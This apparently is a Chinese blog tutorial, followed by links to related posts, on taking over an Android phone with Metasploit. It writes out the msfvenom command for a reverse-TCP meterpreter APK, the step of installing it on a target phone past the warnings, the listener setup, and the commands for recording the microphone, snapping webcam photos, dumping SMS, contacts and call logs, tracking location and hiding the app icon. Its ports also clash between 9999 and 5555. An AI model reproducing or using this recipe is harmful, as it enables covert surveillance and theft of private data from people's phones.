|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

0.环境

  • 虚拟机 KaliLinux
  • 手机 Redmi 6A
  • 同一局域网下

1.查看控制端IP

ifconfig

即192.168.xx.xxx

2.生成木马程序

>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk

-设置监听端主机lhost=192.168.xx.xxx

-设置监听端主机端口lhost=5555

-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk



自动生成了一个10179 bytes 大小的程序

3.把hugboyMsf.apk安装到目标手机并运行

1).如何让虚拟机与主机数据分享,进而发送到手机上安装?

安装VMtools直接拖到本地桌面

Apt update

Apt install open-vm-tools-desktop fuse

Reboot

重启生效

2).发送到手机安装,忽略警告,点击继续。。。

4.打开metasploit工具



5.设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.xx.xxx

set LPORT 5555


exploit

6.显示meterpreter>说明连接成功

常用命令

+麦克风

-record_mic 从麦克风huhugb录制音频X秒

-h 帮助

-d 记录秒数

-F 音频保存路径,默认 HOME/xxxx.wav

-p 自动播放捕获的音频

+webcam_list 列出手机摄像头个数

+webcam_snap 从指定摄像头拍摄照片

-h 帮助

-I 选择要使用的摄像头

-p 图片路径,默认HOME/xxxx.jpeg

-q 图片质量,默认为50

-v 自动查看图片

+webcam_chat 开始视频聊天

+webcam_stream 从摄像拍摄视频

演示

列出设备的摄像头

webcma_list

选择第一个摄像头(后置摄像头)拍照

webcam_snap -i 1

全部命令

help

Stdapi: File system Commands

Command       Description

-------       -----------

cat           Read the contents of a file to the screen

cd            Change directory

checksum      Retrieve the checksum of a file

cp            Copy source to destination

dir           List files (alias for ls)

download      Download a file or directory

edit          Edit a file

getlwd        Print local working directory

getwd         Print working directory

lcd           Change local working directory

lls           List local files

lpwd          Print local working directory

ls            List files

mkdir         Make directory

mv            Move source to destination

pwd           Print working directory

rm            Delete the specified file

rmdir         Remove directory

search        Search for files

upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description

-------       -----------

ifconfig      Display interfaces

ipconfig      Display interfaces

portfwd       Forward a local port to a remote service

route         View and modify the routing table

Stdapi: System Commands

Command       Description

-------       -----------

execute       Execute a command

getuid        Get the user that the server is running as

localtime     Displays the target system's local date and time

pgrep         Filter processes by name

ps            List running processes

shell         Drop into a system command shell

sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command       Description

-------       -----------

screenshare   Watch the remote user's desktop in real time

screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

Command        Description

-------        -----------

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description

-------       -----------

play          play a waveform audio file (.wav) on the target system

Android Commands

Command           Description

-------           -----------

activity_start    Start an Android activity from a Uri string

check_root        Check if device is rooted

dump_calllog      Get call log

dump_contacts     Get contacts list

dump_sms          Get sms messages

geolocate         Get current lat-long using geolocation

hide_app_icon     Hide the app icon from the launcher

interval_collect  Manage interval collection capabilities

send_sms          Sends SMS from target session

set_audio_mode    Set Ringer Mode

sqlite_query      Query a SQLite database from storage

wakelock          Enable/Disable Wakelock

wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

Command        Description

-------        -----------

app_install    Request to install apk file

app_list       List installed apps in the device

app_run        Start Main Activty for package name

app_uninstall  Request to uninstall application

Msf--控制 Android手机的更多相关文章

  1. PC端轻松控制Android手机,PC Control Andoroid,PC控制安卓手机

    记录此次经历的目的是帮助需要的人或下次使用时少走弯路,我为此试用了不少工具及方法,因为追求免费,像"Weak Control:在PC上控制你的Android手机"还要收费的我就不弄 ...

  2. 苹果如何控制android手机,安卓手机怎么控制苹果?

    小编经常通过手机远程控制别人手机,帮助他人解决一些电脑问题,另外还经常需要通过远程电脑控制服务器,管理脚本之家的服务器等等,可能这些对大家都没有什么诱惑,今天笔者为大家带来一个非常有趣的手机控制电脑的 ...

  3. Scrcpy用电脑控制Android手机(支持Windows/macOS/Linux)

    一.scrcpy简介 注意:拼写是scrcpy,非Python爬虫框架Scrapy. scrcpy可以通过adb调试的方式来将手机屏幕投到电脑上,并可以通过电脑控制您的Android设备.它可以通过U ...

  4. 单片机与android手机通信(控制LED小灯亮灭)

    1.单片机实验板功能设计 为验证数据通信内容,让单片机板上的四个按键与android手机客户端上的四个LED灯相互控制:为达到上述基本实验要求,采用单字符传输数据即可,硬件需设计两块相同的单片机电路板 ...

  5. 用鼠标键盘来控制你的Android手机——同屏显示简单教程

    今天在微博上看到有人用电脑鼠标操作iPhone手机玩打飞机游戏,非常炫,虽然自己用的不是iPhone,但相信Android手机肯定也能实现这样的功能,于是网上各种搜索方法,终于看到了一篇试用成功的帖子 ...

  6. 我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(三)Android客户端功能实现

    我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(一)PC服务器端(地址:http://blog.csdn.net/ouyang_pen ...

  7. 电脑控制Android设备的软件——Total Control

    最早开始搞Android开发时,为了调试方便,想找一个Android下的远程控制软件,支持在电脑端远程控制和同步显示Android设备.先后试了360手机助手.Mobizen.Vysor和Mirror ...

  8. Pyqt adb 获取Android手机屏幕

    adb的全称为Android Debug Bridge,就是起到调试桥的作用.adb的工作方式比较特殊,采用监听Socket TCP 5554等端口的方式让IDE和Qemu通讯,默认情况下adb会da ...

  9. GPS部标平台的架构设计(六)-Android手机客户端和手机查车设计

    对于GPS软件平台,虽然有功能非常丰富的PC端或BS客户端,但是客户也是需要移动客户端来作为自己的辅助工具,也是需要的.做为GPS平台的设计者和开发者,在开发移动客户端的时候,也需要从常规的服务器开发 ...

  10. 为什么iphone手机比android手机流畅

    作为当下最流行.市场占用份额最大的两大手机操作系统IOS和android,目前两者加起来的市场占用率达到90%.我曾经一直用android手机,没有用过iphone,那时候正直iphone4和ipho ...

随机推荐

  1. BUAA_2021_SE_READING_#1

    项目 内容 这个作业属于哪个课程 2021春季软件工程(罗杰 任健) 这个作业的要求在哪里 个人阅读作业#1 我在这个课程的目标是 通过课程学习,完成第一个可以称之为"软件"的项目 ...

  2. 2020 OO 第一单元总结 表达式求导

    title: BUAA-OO 第一单元总结 date: 2020-03-19 20:53:41 tags: OO categories: 学习 OO第一单元通过三次递进式的作业让我们实现表达式求导,在 ...

  3. 机器学习--如何理解Accuracy, Precision, Recall, F1 score

    当我们在谈论一个模型好坏的时候,我们常常会听到准确率(Accuracy)这个词,我们也会听到"如何才能使模型的Accurcy更高".那么是不是准确率最高的模型就一定是最好的模型? 这篇博文会向大家解释 ...

  4. 自动化kolla-ansible部署ubuntu20.04+openstack-victoria之系统安装-03

    自动化kolla-ansible部署ubuntu20.04+openstack-victoria之系统安装-03  欢迎加QQ群:1026880196  进行交流学习 一.镜像下载 网易源: http ...

  5. Tomcat9配置HTTP/2

    1 概述 Tomcat从Tomcat8的一些较新版本就支持HTTP/2了,Tomcat9直接支持,本文首先讲述了相关HTTP/2的特性,接着利用一个简单的开源工具mkcert生成证书并利用该证书配置H ...

  6. RTSP 流相关工具介绍

    RTSP (Real Time Streaming Protocol),实时流协议,是一种应用层协议,专为流媒体使用.本文将介绍 GStreamer, VLC, FFmpeg 这几个工具,如何发送.接 ...

  7. CAP 5.0 版本发布通告

    前言 今天,我们很高兴宣布 CAP 发布 5.0 版本正式版.同时我们也很高兴的告诉你 CAP 已经有越来越多的用户并且变得越来越流行. 在 5.0 版本中,我们主要致力于更好的支持 .NET 5 以 ...

  8. 2.1.1- css产生的原因

    CSS的发展历程 从HTML被发明开始,样式就以各种形式存在.不同的浏览器结合它们各自的样式语言为用户提供页面效果的控制.最初的HTML只包含很少的显示属性.随着HTML的成长,为了满足页面设计者的要 ...

  9. MS08_067漏洞攻击

    MS08_067 MS08_067是典型的缓冲区溢出漏洞,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户 ...

  10. UVA10125和集

    题意:       给你一个集合,让你从里面找到4个元素,使得a+b+c=d,并且找到最大的d. 思路:       我们可以吧问题拆开,使得a+b=d-c,这样就能O(n^2)枚举a+b记录出现的和 ...